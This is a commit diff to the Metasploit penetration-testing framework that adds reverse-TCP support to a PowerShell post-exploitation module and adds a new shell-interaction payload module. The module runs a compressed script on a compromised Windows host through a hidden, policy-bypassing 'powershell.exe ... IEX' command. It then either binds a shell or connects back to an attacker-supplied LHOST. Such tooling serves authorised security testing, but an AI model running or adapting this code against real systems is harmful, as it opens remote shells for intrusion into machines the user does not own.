New payloads for reverse_tcp for powershell
parent
9e137c6403
commit
00d8958cc8
|
@ -70,7 +70,13 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'powerfun.ps1')
|
||||
|
||||
script_in = File.read(template_path)
|
||||
|
||||
if datastore['LHOST'].to_s.empty?
|
||||
script_in << "\npowerfun -Command bind"
|
||||
else
|
||||
lhost = datastore['LHOST']
|
||||
script_in << "\npowerfun -Command reverse"
|
||||
end
|
||||
|
||||
mods = ''
|
||||
|
||||
|
@ -85,16 +91,20 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
script_in.gsub!('MODULES_REPLACE', mods)
|
||||
script_in.gsub!('LPORT_REPLACE', lport.to_s)
|
||||
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
|
||||
script = Rex::Powershell::Command.compress_script(script_in)
|
||||
|
||||
res = session.sys.process.execute("powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})", nil, 'Hidden' => true, 'Channelized' => false)
|
||||
fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
|
||||
computer_name = session.sys.config.sysinfo['Computer']
|
||||
vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
|
||||
|
||||
if datastore['LHOST'].to_s.empty?
|
||||
print_status("Attemping to connect to #{rhost}:#{lport}...")
|
||||
ctimeout = 30
|
||||
stime = Time.now.to_i
|
||||
last_error = nil
|
||||
|
||||
while stime + ctimeout > Time.now.to_i
|
||||
Rex::ThreadSafe.sleep(2)
|
||||
begin
|
||||
|
@ -117,7 +127,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return
|
||||
end
|
||||
end
|
||||
|
||||
print_warning("If a shell is unsuccesful, ensure you have access to the target host and port.")
|
||||
print_status("Try adding a route to the host: `route help`")
|
||||
if last_error
|
||||
|
@ -125,5 +134,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
else
|
||||
fail_with(Failure::Unknown, "Unable to connect")
|
||||
end
|
||||
else
|
||||
print_status("Waiting for connection from #{rhost}:#{lport}...")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/find_shell'
|
||||
require 'msf/base/sessions/powershell'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 0
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Command, Interact with Established Connection',
|
||||
'Description' => 'Interacts with a shell on an established socket connection',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'windows',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::PowerShell,
|
||||
'PayloadType' => 'cmd_interact',
|
||||
'RequiredCmd' => 'generic',
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue